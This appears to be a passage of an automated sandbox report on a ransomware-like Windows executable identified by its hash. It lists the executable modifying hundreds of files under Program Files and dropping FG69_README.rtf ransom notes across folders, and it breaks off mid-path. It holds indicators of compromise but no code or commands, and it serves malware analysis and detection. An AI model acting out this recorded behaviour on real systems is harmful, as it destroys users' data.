d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SubmitUnlock.xlsm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.dtd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 